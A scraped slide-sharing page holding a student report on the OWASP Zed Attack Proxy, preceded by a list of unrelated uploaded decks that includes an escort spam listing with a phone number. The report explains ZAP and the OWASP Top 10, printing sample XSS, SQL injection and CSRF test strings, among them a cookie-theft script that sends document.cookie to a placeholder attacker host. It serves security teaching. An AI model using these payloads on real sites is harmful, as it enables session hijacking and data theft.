Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Jisc
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management systemChristalin Nelson
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxAnupkumar Sharma
 
4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptxmary850239
 

Recently uploaded (20)

4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx
 
Keynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designKeynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-design
 
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptxBarangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
 
ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4
 
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
 
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfGrade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
 
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
 
How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management System
 
Culture Uniformity or Diversity IN SOCIOLOGY.pptx
Culture Uniformity or Diversity IN SOCIOLOGY.pptxCulture Uniformity or Diversity IN SOCIOLOGY.pptx
Culture Uniformity or Diversity IN SOCIOLOGY.pptx
 
Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)Global Lehigh Strategic Initiatives (without descriptions)
Global Lehigh Strategic Initiatives (without descriptions)
 
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
HỌC TỐT TIẾNG ANH 11 THEO CHƯƠNG TRÌNH GLOBAL SUCCESS ĐÁP ÁN CHI TIẾT - CẢ NĂ...
 
FILIPINO PSYCHology sikolohiyang pilipino
FILIPINO PSYCHology sikolohiyang pilipinoFILIPINO PSYCHology sikolohiyang pilipino
FILIPINO PSYCHology sikolohiyang pilipino
 
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
 
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSGRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
 
Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...
 
FINALS_OF_LEFT_ON_C'N_EL_DORADO_2024.pptx
FINALS_OF_LEFT_ON_C'N_EL_DORADO_2024.pptxFINALS_OF_LEFT_ON_C'N_EL_DORADO_2024.pptx
FINALS_OF_LEFT_ON_C'N_EL_DORADO_2024.pptx
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management system
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
 
4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx4.16.24 21st Century Movements for Black Lives.pptx
4.16.24 21st Century Movements for Black Lives.pptx
 

The OWASP Zed Attack Proxy

  • 1. THE OWASP ZED ATTACK PROXY Research and Development Project Final Report Submitted By:- Pallav Dhobley 09005012 Aditya Gupta 09005017
  • 2. WARNING Security Testing is VERY ILLEGAL ON UNAUTHORIZED SYSTEMS
  • 3. Overview • Introduction • OWASP Top 10 Application Security Risks – 2010 • Setting up the Environment • Functioning of ZAP • Conclusion • References
  • 5. About OWASP • Full form: Open Web Application Security Project • An open-source application security project • Works to create freely-available • Articles • Methodologies • Documentation • Tools, and • Technologies
  • 6. Features of OWASP • It provides free and open source • Application security tools and standards • Complete books on application security testing, secure code development, and security code review • Standard security controls and libraries • Local chapters worldwide • Cutting edge research • Extensive conferences worldwide • Mailing lists
  • 7. History of OWASP • OWASP was started on September 9, 2001 • It was started by Mark Curphey and Dennis Groves. • Since late 2003, Jeff Williams served as the volunteer Chair of OWASP until September 2011. • The current chair is Michael Coates, and vice chair is Eoin Keary. • The OWASP Foundation was established in 2004 and supports the OWASP infrastructure and projects
  • 8. OWASP-Zed Attack Proxy • The Zed Attack Proxy (ZAP) is penetration testing tool for finding vulnerabilities in web applications. • Designed to be used by people with a wide range of security experience • Ideal for new developers and functional testers who are new to penetration testing • Useful addition to an experienced pen testers toolbox • Released September 2010 • Current Version -: 2.0.0
  • 9. ZAP Principles • Free, Open source • Cross platform • Easy to use • Easy to install • Internationalized • Fully documented • Involvement actively encouraged • Reuse well regarded components
  • 10. Features of ZAP • Intercepting proxy • Automated scanner • Passive scanner • Brute force scanner • Spider • Fuzzer • Port scanner • Dynamic SSL Certificates • API • Beanshell integration
  • 12. Top 10 Application Security Risks • A1 – Injection • A2 – Cross-Site Scripting (XSS) • A3 – Broken Authentication and Session Management • A4 – Insecure Direct Object References • A5 – Cross-Site Request Forgery (CSRF) • A6 – Security Misconfiguration • A7 – Insecure Cryptographic Storage • A8 – Failure to Restrict URL Access • A9 – Insufficient Transport Layer Protection • A10 – Invalidated Redirects and Forwards
  • 13. XSS - Cross Site Scripting • Problem: User controlled data returned in HTTP response contains HTML/JavaScript code • Impact: Session Hijacking, Full Control of Page, Malicious Redirects • Basic XSS Test:" ><script>alert(document.cookie)</script> • Cookie Theft Example: "><script>document.location='http://attackersite/ '+document.cookie</script>
  • 14. Types of XSS • Stored XSS Attacks • The injected code is permanently stored on the target servers • Reflected XSS Attacks • Injected code is reflected off the web server, such as in an error message, search result, or any other response • DOM Based XSS • Attack payload is executed as a result of modifying the DOM “environment” in the victim‟s browser used by the original client side script
  • 15. Prevention of XSS • Solution • Output Encoding • converts command characters to benign characters • Input Validation • Example • <script> becomes &lt;script&gt; < &lt > &gt “ &quote „ &#x27 & HTML ENCODING &amp
  • 16. SQL Injection • Problem: Incorrectly validated or non-validated string literals are concatenated into a dynamic SQL statement, and interpreted as code by the SQL engine. • Impact: Arbitrary SQL Execution, Data Corruption, Data Theft • Basic SQL Injection Tests: • OR 1=1 --' OR '1'= '1'-- • Example Vulnerable Query: • sqlQ = “Select user from UserTable where name= '+username+ ' and pass = '+password+ ' ”
  • 17. Types of SQL Injections • First Order Attack • The attacker can simply enter a malicious string and cause the modified code to be executed immediately. • Second Order Attack • The attacker injects into persistent storage (such as a table row) which is deemed as a trusted source. An attack is subsequently executed by another activity. • Lateral Injection. • The attacker can manipulate the implicit functionTo_Char() by changing the values of the environment variables
  • 18. Prevention of SQL Injection • Reduce the attack surface. • Ensure that all excess database privileges are revoked • Avoid dynamic SQL with concatenated input • Use bind arguments. • Filter and sanitize input. • The Oracle-supplied DBMS_ASSERT package contains a number of functions that can be used to sanitize user input
  • 19. Cross Site Request Forgery (CSRF) • Problem: • Browser cannot distinguish between user initiated actions and automated actions • Websites process valid requests that are authorized to user and contain user session id • Impact: • Attacker can perform arbitrary actions with victim user‟s account on third party site. • Not traceable, logs show user performed these actions. • Basic CSRF Test: • <img src=”http://targetsite/?action=deleteAccount”></img>
  • 20. Prevention Measures That Do NOT Work • Using a Secret Cookie • Only Accepting POST Requests • Multi-Step Transactions • URL Rewriting
  • 21. Prevention of CSRF • Preventing CSRF requires the inclusion of an unpredictable token in the body or URL of each HTTP request • Such tokens should at a minimum be unique per user session, but can also be unique per request. • The preferred option is to include the unique token in a hidden field. • The unique token can also be included in the URL itself, or a URL parameter
  • 23. Installation and Configuration of ZAP • Download Link: • http://code.google.com/p/zaproxy/downloads/list • Zap runs on proxy. To set up the proxy in ZAP • go to TOOLS > OPTIONS > LOCAL PROXY in ZAP • Same configuration in the browser too
  • 24. Setting Up Web Security Learning Lab • Required Software • Virtual Machine Software • OWASP Broken Web Apps VM • Web Proxy - Recommend OWASP Zap Proxy • Web Proxy - Alternative Burp Proxy • Browser - Recommend Firefox • Optional - Browser Plugins • Firebug • Firecookie • Installation instructions are written in the final report
  • 26. Functioning of ZAP • Intercepting the traffic • Traditional and AJAX spiders • Automated scanners • Analysing the scan results • Reporting
  • 27. Intercepting the traffic • Configure the browser to use ZAP proxy server on localhost • Can intercept all traffic to a user specified website/server • Can click on any link on the site to observe the captured request • Can modify this request before forwarding it to the server • The response can also be intercepted before forwarding it to the browser
  • 28. Spidering • ZAP spider is needed to crawl links that are not directly visible • It automatically discovers and explores the hidden links for a site • Newly discovered URLs are shown • URLs whose domain is different from target are also listed
  • 29. Scanning the website • Active Scanning • Can select a site to be attacked under the „Attack‟ section • Tool actually attacks the application in all possible ways to find out all possible vulnerabilities • Some of the issues active scan looks for are : • Cross Site Scripting • SQL Injection • External Redirect • Parameter tampering • Directory browsing • All findings shown under „Alerts‟ tab
  • 30. Scanning the website • Passive scanning • Unlike active scanning, passive scanning does not change any responses coming from server • Only looks at responses to identify vulnerabilities • Safe to use • Some of the issues passive scanning looks for : • Incomplete or no cache-control and pragma HTTP Header set • Cross-domain JavaScript source file inclusion • Cross Site Request Forgery • Password Autocomplete in browser • Weak authentication
  • 31. Analysis and Reporting • No tool‟s report is free from false positives • Security analyst can determine which vulnerabilities are false positives • It also shows the level of threat associated with the vulnerability • High, Medium, Low • Analysed results are used to generate the report • Can generate a detailed report of all vulnerabilities; can be exported to HTML file and viewed in a browser
  • 32. Other ZAP features • Port Scan • This feature scans open ports on the target site and lists them accordingly • Encode/Decode Hash • This feature is used to encode/ decode the text entered • Fuzzing • Fuzzing is the process of sending invalid and unexpected input to the application to observe the behaviour • Extensions for ZAP • ZAP has plugins like LDAP Injection, session fixation etc. and many others that can be found on • http://code.google.com/p/zap-extensions/
  • 34. ZAP- Firefox of Web Security • ZAP is a free, open-source community developed tool aimed at making the online world more secure • Some of the ideals that have driven ZAP are listed below • Help users develop and apply application security skills • Build a competitive, open source, and community oriented platform • Provide an extensible platform for testing • Designed to be easy to use • Raise the bar for other security tools
  • 35. Future of ZAP • Enhance scanners to detect more vulnerabilities • Extend API, better integration • Fuzzing analysis • Easier to use, better help
  • 36. References • Open Web Application Security Project • https://www.owasp.org/index.php/Main_Page • OWASP Top Ten Project • https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Proj ect • Cross-site Scripting (XSS) • https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) • OWASP Zed Attack Proxy Project • https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Proj ect • Zaproxy : • https://code.google.com/p/zaproxy/
  • 37. References (contd.) • ZAP Blog: • http://zaproxy.blogspot.co.uk/ • Penetration Testing For Developers • http://pentest4devs.blogspot.in/2010/09/exploring-web-application- with-zap.html • Setting Up Web Security Learning Lab • http://people.mozilla.org/~mcoates/WebSecurityLab.html • Webgoat: • https://www.owasp.org/index.php/OWASP_WebGoat_Project